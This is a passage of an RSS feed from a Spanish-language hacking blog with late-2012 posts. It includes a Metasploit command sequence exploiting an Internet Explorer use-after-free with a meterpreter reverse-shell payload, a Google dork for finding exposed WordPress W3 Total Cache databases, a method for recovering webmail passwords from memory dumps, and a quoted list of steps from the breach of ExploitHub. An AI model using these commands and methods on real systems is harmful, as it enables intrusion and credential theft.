&lt;/script&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/Hacking-blackploit/~4/zvwgLPeIKT0" height="1" width="1"/&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2013-01-27T23:47:14.501-03:00</app:edited><media:thumbnail url="http://2.bp.blogspot.com/-EZHSYBeyL0Y/UQXmNWvJB5I/AAAAAAAABwo/U2FiCTl_HNw/s72-c/Feliz+2013.bmp" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://www.blackploit.com/2012/12/feliz-ano-nuevo-y-prospero-2013.html</feedburner:origLink></item><item><title>Grave 0-Day en Internet Explorer 6, 7 y 8 Vulnerabilidad CDwnBindInfo [Video MSF]</title><link>http://feedproxy.google.com/~r/Hacking-blackploit/~3/85hjbZA6bJ4/grave-0-day-en-internet-explorer-6-7-y.html</link><category>Bug</category><category>Seguridad Web</category><category>Noticias</category><category>Metasploit</category><category>Exploit</category><category>Seguridad</category><author>noreply@blogger.com (Zion3R)</author><pubDate>Sun, 30 Dec 2012 22:04:05 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8845092171963399971.post-2779757849849282005</guid><description>&lt;div style="text-align: justify;"&gt;
&lt;a href="http://3.bp.blogspot.com/-VFGcBeozRO0/UFtL1WZoDGI/AAAAAAAAA_8/Oli_RicIrdQ/s200/IE_oday.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" src="http://3.bp.blogspot.com/-VFGcBeozRO0/UFtL1WZoDGI/AAAAAAAAA_8/Oli_RicIrdQ/s200/IE_oday.png" /&gt;&lt;/a&gt;Se ha detectado un grave 0day en &lt;b&gt;Internet Explorer versiones 6, 7 y 8&lt;/b&gt;. El día miércoles 26 de diciembre CFR.org ha sido víctima de un ataque mal intencionado, ataque en el cual los visitantes que usaban &lt;b&gt;Internet Explorer &lt;/b&gt;eran infectados por un &lt;b&gt;nuevo 0Day&lt;/b&gt;. Ya se tenia registro de esta vulnerabilidad desde el 7 de Diciembre, pero fue gracia a lo ocurrido en CFR.org que &lt;b&gt;&lt;a href="http://blog.vulnhunt.com/index.php/2012/12/29/new-ie-0day-coming-mshtmlcdwnbindinfo-object-use-after-free-vulnerability/" target="_blank"&gt;binjo&lt;/a&gt;&lt;/b&gt;, &lt;b&gt;&lt;a href="http://eromang.zataz.com/2012/12/29/attack-and-ie-0day-informations-used-against-council-on-foreign-relations/" target="_blank"&gt;Eric Romang&lt;/a&gt;&lt;/b&gt; y &lt;b&gt;&lt;a href="http://blog.fireeye.com/research/2012/12/council-foreign-relations-water-hole-attack-details.html" target="_blank"&gt;FireEye&lt;/a&gt;&lt;/b&gt; han realizado unos acuciosos análisis, y desde ayer que se tiene un módulo funcional en Metasploit que explota este fallo.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Este módulo se aprovecha de un fallo que ocurre cuando el objeto CDwnBindInfo es liberado por FollowHyperlink2, pero una referencia se mantiene en CDOC. Como resultado, cuando se usa la referencia durante la recarga de la página, se puede manipular una parte de la memoria, dando paso así a poder ejecutar código arbitrario.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;/div&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Les dejo un Vídeo demostrativo donde explotan el fallo con Metasploit:&lt;/div&gt;
&lt;br /&gt;
&lt;center&gt;&lt;iframe width="640" height="360" src="http://www.youtube.com/embed/9od6Fhc84d4" frameborder="0" allowfullscreen&gt;&lt;/iframe&gt;&lt;/center&gt;
&lt;script type="text/javascript"&gt;&lt;!--
google_ad_client = "ca-pub-7669852180477439";
/* 336 x 280 */
google_ad_slot = "8058258251";
google_ad_width = 336;
google_ad_height = 280;
//--&gt;
&lt;/script&gt;
&lt;script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js"&gt;
&lt;/script&gt;
&lt;br /&gt;
&lt;pre&gt;&lt;code&gt;use exploit/windows/browser/ie_cdwnbindinfo_uaf
set SRVHOST 192.168.178.26
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

sysinfo
getuid&lt;/code&gt;&lt;/pre&gt;
&lt;b&gt;Referencias:&lt;/b&gt;&lt;br /&gt;&lt;a href="http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4792" target="_blank"&gt;http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4792&lt;/a&gt;&lt;br /&gt;&lt;a href="http://technet.microsoft.com/en-us/security/advisory/2794220" target="_blank"&gt;http://technet.microsoft.com/en-us/security/advisory/2794220&lt;/a&gt;&lt;br /&gt;&lt;a href="http://blog.vulnhunt.com/index.php/2012/12/29/new-ie-0day-coming-mshtmlcdwnbindinfo-object-use-after-free-vulnerability/" target="_blank"&gt;http://blog.vulnhunt.com/index.php/2012/12/29/new-ie-0day-coming-mshtmlcdwnbindinfo-object-use-after-free-vulnerability/&lt;/a&gt;&lt;br /&gt;&lt;a href="http://blog.fireeye.com/research/2012/12/council-foreign-relations-water-hole-attack-details.html" target="_blank"&gt;http://blog.fireeye.com/research/2012/12/council-foreign-relations-water-hole-attack-details.html&lt;/a&gt;&lt;br /&gt;&lt;a href="http://eromang.zataz.com/2012/12/29/attack-and-ie-0day-informations-used-against-council-on-foreign-relations/" target="_blank"&gt;http://eromang.zataz.com/2012/12/29/attack-and-ie-0day-informations-used-against-council-on-foreign-relations/&lt;/a&gt;&lt;br /&gt;&lt;b&gt;Video:&lt;/b&gt;&lt;br /&gt;&lt;a href="http://eromang.zataz.com/2012/12/30/microsoft-internet-explorer-cdwnbindinfo-vulnerability-metasploit-demo/" target="_blank"&gt;http://eromang.zataz.com/2012/12/30/microsoft-internet-explorer-cdwnbindinfo-vulnerability-metasploit-demo/&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
[+] Salu2
&lt;div class="blogger-post-footer"&gt;&lt;script type="text/javascript"&gt;&lt;!--
google_ad_client = "ca-pub-7669852180477439";
/* 728 x 90 */
google_ad_slot = "5824550688";
google_ad_width = 728;
google_ad_height = 90;
//--&gt;
&lt;/script&gt;
&lt;script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js"&gt;
&lt;/script&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/Hacking-blackploit/~4/85hjbZA6bJ4" height="1" width="1"/&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2012-12-31T03:04:05.585-03:00</app:edited><media:thumbnail url="http://3.bp.blogspot.com/-VFGcBeozRO0/UFtL1WZoDGI/AAAAAAAAA_8/Oli_RicIrdQ/s72-c/IE_oday.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://www.blackploit.com/2012/12/grave-0-day-en-internet-explorer-6-7-y.html</feedburner:origLink></item><item><title>Vulnerabilidad Crítica en WordPress en popular plugin "W3 Total Cache"</title><link>http://feedproxy.google.com/~r/Hacking-blackploit/~3/6zaQLvo2YcU/vulnerabilidad-critica-en-wordpress-en.html</link><category>Bug</category><category>Seguridad Web</category><category>Noticias</category><category>Exploit</category><category>Seguridad</category><author>noreply@blogger.com (Zion3R)</author><pubDate>Thu, 27 Dec 2012 10:39:36 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8845092171963399971.post-7738166620646728148</guid><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-cMyo8QN4fXw/UNuLeXjHn_I/AAAAAAAABrk/WrddfEoh7UI/s1600/W3+Total+Cache+critical+Vulnerability.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="206" src="http://3.bp.blogspot.com/-cMyo8QN4fXw/UNuLeXjHn_I/AAAAAAAABrk/WrddfEoh7UI/s640/W3+Total+Cache+critical+Vulnerability.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Recientemente se ha descubierto una Vulnerabilidad Crítica en el popular plugin &lt;i&gt;&lt;b&gt;"W3 Total Cache"&lt;/b&gt;&lt;/i&gt; de WordPress &lt;span class="" id="result_box" lang="es"&gt;&lt;span class=""&gt;que&lt;/span&gt; &lt;span class="hps"&gt;se utiliza para mejorar&lt;/span&gt; &lt;span class="hps"&gt;el rendimiento del sitio&lt;/span&gt; &lt;span class="hps"&gt;y la experiencia de&lt;/span&gt; &lt;span class="hps"&gt;usuario a través de&lt;/span&gt; &lt;span class="hps"&gt;almacenamiento del cache. Este &lt;/span&gt;&lt;/span&gt;&lt;span class="" id="result_box" lang="es"&gt;&lt;span class="hps"&gt;Full-disclosure ocurre debido a la forma &lt;/span&gt;&lt;/span&gt;&lt;span class="" id="result_box" lang="es"&gt;&lt;span class="hps"&gt;en&lt;/span&gt; que &lt;b&gt;&lt;span class="hps"&gt;W3TC&lt;/span&gt; &lt;/b&gt;&lt;span class="hps"&gt;almacena la caché de&lt;/span&gt; &lt;span class="hps"&gt;base de datos en directorios con acceso público, donde en el mejor (o peor de los casos para los webmasters) &lt;/span&gt;&lt;/span&gt;&lt;span class="" id="result_box" lang="es"&gt;&lt;span class="hps"&gt;se pueden recuperar&lt;/span&gt; &lt;span class="hps"&gt;los hashes de contraseñas&lt;/span&gt; &lt;span class="hps"&gt;y la información&lt;/span&gt; &lt;span class="hps"&gt;de base de datos&lt;/span&gt; guardad en el cache.&lt;/span&gt;&lt;span class="" id="result_box" lang="es"&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="hps"&gt;La ubicación predeterminada&lt;/span&gt; &lt;span class="hps"&gt;donde&lt;/span&gt; &lt;span class="hps"&gt;este&lt;/span&gt; &lt;span class="hps"&gt;plugin &lt;/span&gt;&lt;/span&gt;&lt;span class="" id="result_box" lang="es"&gt;&lt;span class="hps"&gt;guarda &lt;/span&gt;&lt;/span&gt;&lt;span class="" id="result_box" lang="es"&gt;&lt;span class="hps"&gt;los&lt;/span&gt; &lt;span class="hps"&gt;datos&lt;/span&gt; &lt;span class="hps"&gt;es "&lt;b&gt;/wp-content/w3tc/dbcache/&lt;/b&gt;".&lt;/span&gt;&lt;span class="hps"&gt;&lt;/span&gt;&lt;span class="hps"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;script type="text/javascript"&gt;&lt;!--
google_ad_client = "ca-pub-7669852180477439";
/* 728 x 90 */
google_ad_slot = "5824550688";
google_ad_width = 728;
google_ad_height = 90;
//--&gt;
&lt;/script&gt;
&lt;script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js"&gt;
&lt;/script&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span class="" id="result_box" lang="es"&gt;&lt;span class="hps"&gt;Por lo famoso que es este&lt;/span&gt; &lt;span class="hps"&gt;plugin,&lt;/span&gt;&lt;span class="hps"&gt; lo transforma en una&lt;/span&gt;&lt;span class="hps"&gt; amenaza poderosa para los usuarios de WordPress, y un potencial atacante podría comprometer fácilmente la web en su totalidad.&lt;/span&gt; &lt;span class="hps"&gt;La recomendación para los webmasters&lt;/span&gt; &lt;span class="hps"&gt;es que actualice&lt;/span&gt; &lt;span class="hps"&gt;el plugin&lt;/span&gt; &lt;span class="hps"&gt;a la versión&lt;/span&gt; &lt;span class="hps"&gt;nueva&lt;/span&gt; &lt;span class="hps"&gt;o denegar el acceso&lt;/span&gt; &lt;span class="hps"&gt;al directorio agregando un&lt;/span&gt;&lt;span class="hps"&gt;&lt;/span&gt; &lt;b&gt;&lt;span class="hps"&gt;htccess&lt;/span&gt;&lt;/b&gt;&lt;span class="hps"&gt;.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span class="" id="result_box" lang="es"&gt;La masividad y facilidad de explotar esta falla se hace notar con una simple búsqueda con&lt;i&gt;&lt;b&gt; google&lt;/b&gt;&lt;/i&gt;:&lt;/span&gt;&lt;/div&gt;
&lt;pre&gt;&lt;code&gt;inurl:/wp-content/w3tc/dbcache/&lt;/code&gt;&lt;/pre&gt;
&lt;br /&gt;
&lt;span class="" id="result_box" lang="es"&gt;Encontramos 227.000 resultados y la mayoría son vulnerables.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-xhBl6ribS3I/UNuK2B7voLI/AAAAAAAABrU/LmYCma1SWmU/s1600/WordPress+plugin+W3+Total+Cache+critical+Vulnerability+1.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="620" src="http://3.bp.blogspot.com/-xhBl6ribS3I/UNuK2B7voLI/AAAAAAAABrU/LmYCma1SWmU/s640/WordPress+plugin+W3+Total+Cache+critical+Vulnerability+1.bmp" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span class="" id="result_box" lang="es"&gt;y simplemente hay que abrir los archivos con un editor de texto plano para poder ver las bases de datos guardadas en cache.&lt;/span&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-LDx5VxxAbH0/UNuK853HMsI/AAAAAAAABrc/7PJPrvB6ITI/s1600/WordPress+plugin+W3+Total+Cache+critical+Vulnerability+2.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="74" src="http://4.bp.blogspot.com/-LDx5VxxAbH0/UNuK853HMsI/AAAAAAAABrc/7PJPrvB6ITI/s640/WordPress+plugin+W3+Total+Cache+critical+Vulnerability+2.bmp" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;

&lt;br&gt;&lt;b&gt;Más información:&lt;/b&gt; &lt;a href="http://seclists.org/fulldisclosure/2012/Dec/242"&gt;http://seclists.org/fulldisclosure/&lt;/a&gt;&lt;br&gt;

&lt;span class="" id="result_box" lang="es"&gt;&amp;nbsp;&lt;/span&gt;&lt;span class="" id="result_box" lang="es"&gt;&lt;br /&gt;[-] Salu2&lt;/span&gt;&lt;br /&gt;
&lt;span class="" id="result_box" lang="es"&gt;[-] Zion3R&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;script type="text/javascript"&gt;&lt;!--
google_ad_client = "ca-pub-7669852180477439";
/* 728 x 90 */
google_ad_slot = "5824550688";
google_ad_width = 728;
google_ad_height = 90;
//--&gt;
&lt;/script&gt;
&lt;script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js"&gt;
&lt;/script&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/Hacking-blackploit/~4/6zaQLvo2YcU" height="1" width="1"/&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2012-12-27T15:39:36.076-03:00</app:edited><media:thumbnail url="http://3.bp.blogspot.com/-cMyo8QN4fXw/UNuLeXjHn_I/AAAAAAAABrk/WrddfEoh7UI/s72-c/W3+Total+Cache+critical+Vulnerability.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://www.blackploit.com/2012/12/vulnerabilidad-critica-en-wordpress-en.html</feedburner:origLink></item><item><title>Blackploit les desea Feliz Navidad y Próspero Año Nuevo!</title><link>http://feedproxy.google.com/~r/Hacking-blackploit/~3/8JFTcDvtHns/blackploit-les-desea-feliz-navidad-y.html</link><category>Blackploit</category><author>noreply@blogger.com (Zion3R)</author><pubDate>Mon, 24 Dec 2012 11:02:24 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8845092171963399971.post-235690573128593113</guid><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-ZOciBo2nsSc/UNil04Xs7UI/AAAAAAAABqM/hmpRBuOAtgU/s1600/ARBOL-NAVIDAD-Blackploit.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://3.bp.blogspot.com/-ZOciBo2nsSc/UNil04Xs7UI/AAAAAAAABqM/hmpRBuOAtgU/s320/ARBOL-NAVIDAD-Blackploit.png" width="219" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Blackploit les desea una excelente Navidad y un Próspero Año Nuevo!! De paso quiero agradecerles todas sus visitas, lecturas y comentarios, esperamos que en este año que comienza poder seguir escribiéndoles y de paso seguir creciendo!&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Les deseo lo mejor, sigan leyendo y estudiando ;)&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
[+] Salu2&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
[-] Zione&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;a href="http://hack-tools.blackploit.com/" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;" target="_blank"&gt;&lt;img border="0" height="100" src="http://1.bp.blogspot.com/-bKIkz6fYoaM/UNimHCEUN_I/AAAAAAAABqU/ykUrqC8V8O8/s200/shadowgun-icon_180x180.jpg" width="100" /&gt;&lt;/a&gt;&lt;b&gt;P.D:&lt;/b&gt; Aprovechando este Post quería anunciarles que mi amigo &lt;b&gt;Dump3R&lt;/b&gt; a abierto un blog sobre &lt;b&gt;Herramientas y Apps de Hack y PenTest&lt;/b&gt;, y yo le he prestado subdominio. Si tienen tiempo visitenlo ;)&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://hack-tools.blackploit.com/" target="_blank"&gt;&lt;span style="font-size: large;"&gt;&lt;b&gt;http://hack-tools.blackploit.com/ &lt;/b&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="blogger-post-footer"&gt;&lt;script type="text/javascript"&gt;&lt;!--
google_ad_client = "ca-pub-7669852180477439";
/* 728 x 90 */
google_ad_slot = "5824550688";
google_ad_width = 728;
google_ad_height = 90;
//--&gt;
&lt;/script&gt;
&lt;script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js"&gt;
&lt;/script&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/Hacking-blackploit/~4/8JFTcDvtHns" height="1" width="1"/&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2012-12-24T16:02:24.361-03:00</app:edited><media:thumbnail url="http://3.bp.blogspot.com/-ZOciBo2nsSc/UNil04Xs7UI/AAAAAAAABqM/hmpRBuOAtgU/s72-c/ARBOL-NAVIDAD-Blackploit.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://www.blackploit.com/2012/12/blackploit-les-desea-feliz-navidad-y.html</feedburner:origLink></item><item><title>Obtener Contraseñas de Hotmail, Yahoo, Gmail de la Memoria</title><link>http://feedproxy.google.com/~r/Hacking-blackploit/~3/9W2Eonogkxw/obtener-contrasenas-de-hotmail-yahoo.html</link><category>Herramientas</category><category>Hack T00LZ</category><category>Windows OS</category><category>Trucos</category><category>Bug</category><category>Seguridad Web</category><category>Hack Tips</category><category>Noticias</category><category>Exploit</category><category>Trucos Win</category><category>Seguridad</category><author>noreply@blogger.com (Zion3R)</author><pubDate>Wed, 19 Dec 2012 10:51:38 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8845092171963399971.post-8269013073346689697</guid><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-P_x8TuDOOuU/UNIGHnY8yII/AAAAAAAABn8/kOkHlE_ZQuo/s1600/DumpIt.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="324" src="http://1.bp.blogspot.com/-P_x8TuDOOuU/UNIGHnY8yII/AAAAAAAABn8/kOkHlE_ZQuo/s640/DumpIt.bmp" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
La mayoría de las personas se sienten seguras al &lt;i&gt;&lt;b&gt;"Cerrar Sesión"&lt;/b&gt;&lt;/i&gt; o al hacer &lt;i&gt;&lt;b&gt;"Sign Out"&lt;/b&gt;&lt;/i&gt; en una web, yo también lo estaría, el problema es que las peticiones webs quedan&amp;nbsp; guardadas en memoria, y con la ayuda de un programa podemos volcarlas (recuperarlas) y con un Editor Hexadecimal revisarlas para poder analizarlas legíblemente.&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;div style="float:left; margin:5px;"&gt;&lt;script type="text/javascript"&gt;&lt;!--
google_ad_client = "ca-pub-7669852180477439";
/* 250 x 250 */
google_ad_slot = "9258007445";
google_ad_width = 250;
google_ad_height = 250;
//--&gt;
&lt;/script&gt;
&lt;script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js"&gt;
&lt;/script&gt;&lt;/div&gt;&lt;br /&gt;
Es así como Hotmail, Yahoo, Gmail y muchas otras webs con autentificación en algún momento dentro de las peticiones locales pasan la contraseña en texto plano, lo cual es un problema ya que como dije antes, podemos recuperar de la memoria estas peticiones y conseguir la contraseña en bonito texto plano.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Aquí les dejo un video donde usan &lt;b&gt;MoonSols Windows Memory "DumpIt"&lt;/b&gt; para volcar la memoria y &lt;b&gt;WinHex&lt;/b&gt; para obtener localmente las contraseñas de Hotmail, Yahoo, Gmail. Recuerden también que este método es efectivo con la mayoría de webs con autentificación sólo que hay que identificar el &lt;b&gt;ID&lt;/b&gt; necesario para poder encontrar la contraseña, normalmente es "&lt;i&gt;passwd&lt;/i&gt;", "&lt;i&gt;password&lt;/i&gt;", "&lt;i&gt;pass&lt;/i&gt;", "&lt;i&gt;psswd&lt;/i&gt;", "&lt;i&gt;pwd&lt;/i&gt;", es cosa de usar la imaginación.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="font-size: large;"&gt;&lt;b&gt;Herramientas:&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;ul style="text-align: justify;"&gt;
&lt;li&gt;&lt;a href="http://www.moonsols.com/wp-content/plugins/download-monitor/download.php?id=7" target="_blank"&gt;&lt;span style="font-size: large;"&gt;&lt;b&gt;MoonSols Windows Memory "DumpIt"&lt;/b&gt;&lt;/span&gt;&lt;/a&gt;&lt;span style="font-size: large;"&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://winhex.com/winhex/" target="_blank"&gt;&lt;span style="font-size: large;"&gt;&lt;b&gt;WinHex: Computer Forensics &amp;amp; Data Recovery Software, Hex Editor &amp;amp; Disk Editor&lt;/b&gt;&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;center&gt;&lt;iframe width="640" height="360" src="http://www.youtube.com/embed/xATNboFKUxk" frameborder="0" allowfullscreen&gt;&lt;/iframe&gt;&lt;/center&gt;
&lt;br /&gt;
[+] Salu2&lt;br /&gt;
[*] Zion3R
&lt;div class="blogger-post-footer"&gt;&lt;script type="text/javascript"&gt;&lt;!--
google_ad_client = "ca-pub-7669852180477439";
/* 728 x 90 */
google_ad_slot = "5824550688";
google_ad_width = 728;
google_ad_height = 90;
//--&gt;
&lt;/script&gt;
&lt;script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js"&gt;
&lt;/script&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/Hacking-blackploit/~4/9W2Eonogkxw" height="1" width="1"/&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2012-12-19T15:51:38.769-03:00</app:edited><media:thumbnail url="http://1.bp.blogspot.com/-P_x8TuDOOuU/UNIGHnY8yII/AAAAAAAABn8/kOkHlE_ZQuo/s72-c/DumpIt.bmp" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://www.blackploit.com/2012/12/obtener-contrasenas-de-hotmail-yahoo.html</feedburner:origLink></item><item><title>Inj3ct0r Team hackea a ExploitHub y roba más de 200 Exploits Privados</title><link>http://feedproxy.google.com/~r/Hacking-blackploit/~3/7_VXZn_ISnE/inj3ct0r-team-hackea-exploithub-y-roba.html</link><category>Seguridad Web</category><category>Noticias</category><category>Exploit</category><category>Seguridad</category><category>Leaks</category><author>noreply@blogger.com (Zion3R)</author><pubDate>Sat, 15 Dec 2012 06:29:12 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8845092171963399971.post-7609315583098063463</guid><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-nM2MlLnBxQk/UMfKy8PvzFI/AAAAAAAABms/WDEZAmq11SU/s1600/logo_green.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="256" src="http://1.bp.blogspot.com/-nM2MlLnBxQk/UMfKy8PvzFI/AAAAAAAABms/WDEZAmq11SU/s640/logo_green.jpg" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Recientemente &lt;a href="http://1337day.com/" target="_blank"&gt;&lt;b&gt;Inj3ct0r Team&lt;/b&gt;&lt;/a&gt; ha hackeado a &lt;a href="http://exploithub.com/" target="_blank"&gt;&lt;b&gt;ExploitHub&lt;/b&gt;&lt;/a&gt;, quienes guardaban consigo &lt;b&gt;más de 200 exploits privados&lt;/b&gt; que comercializaban a módicos precios (más abajo la tabla con los detalles).&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
En un archivo publicado por &lt;a href="http://1337day.com/" target="_blank"&gt;&lt;b&gt;Inj3ct0r Team&lt;/b&gt;&lt;/a&gt; (&lt;a href="http://priv8.1337day.com/exploitHUB.txt"&gt;http://priv8.1337day.com/exploitHUB.txt&lt;/a&gt;) dejan entrever la facilidad con la que actuaron:&lt;/div&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
&lt;pre&gt;&lt;code&gt;I am very much surprised when he learned of Magento eCommerce Software and search /install/ 

1) We scan server and site
2) We reinstall Magento CMS https://www.exploithub.com/install/  &amp;lt;= We reinstall Magento CMS
3) Upload shell and phpinfo https://www.exploithub.com/phpinfo.php
4) backup all files and database.
5) Upload piece of the database https://www.exploithub.com/export/
6) Increased privileges and use root


We have exploithub.com private database and FTP files)&lt;/code&gt;&lt;/pre&gt;
&lt;br /&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-SAJDXKv8DHw/UMda2p-rGEI/AAAAAAAAFtI/KycHb5nXVgE/s1600/phpinfo.JPG" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="640" src="http://1.bp.blogspot.com/-SAJDXKv8DHw/UMda2p-rGEI/AAAAAAAAFtI/KycHb5nXVgE/s640/phpinfo.JPG" width="516" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;PHPinfo &lt;a href="http://exploithub.com/" target="_blank"&gt;&lt;b&gt;ExploitHub&lt;/b&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;div style="float:left; margin:5px;"&gt;&lt;script type="text/javascript"&gt;&lt;!--
google_ad_client = "ca-pub-7669852180477439";
/* 336 x 280 */
google_ad_slot = "8058258251";
google_ad_width = 336;
google_ad_height = 280;
//--&gt;
&lt;/script&gt;
&lt;script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js"&gt;
&lt;/script&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
En este momento todos los exploits robados están en &lt;a href="http://1337day.com/"&gt;&lt;b&gt;http://1337day.com/&lt;/b&gt;&lt;/a&gt;&lt;b&gt;,&lt;/b&gt; algunos son gratis y otros son de pago... 
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Mal por la seguridad de &lt;a href="http://exploithub.com/" target="_blank"&gt;&lt;b&gt;ExploitHub&lt;/b&gt;&lt;/a&gt; y en este mismo momento estoy revisando los exploits filtrados a ver con que me encuentro.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
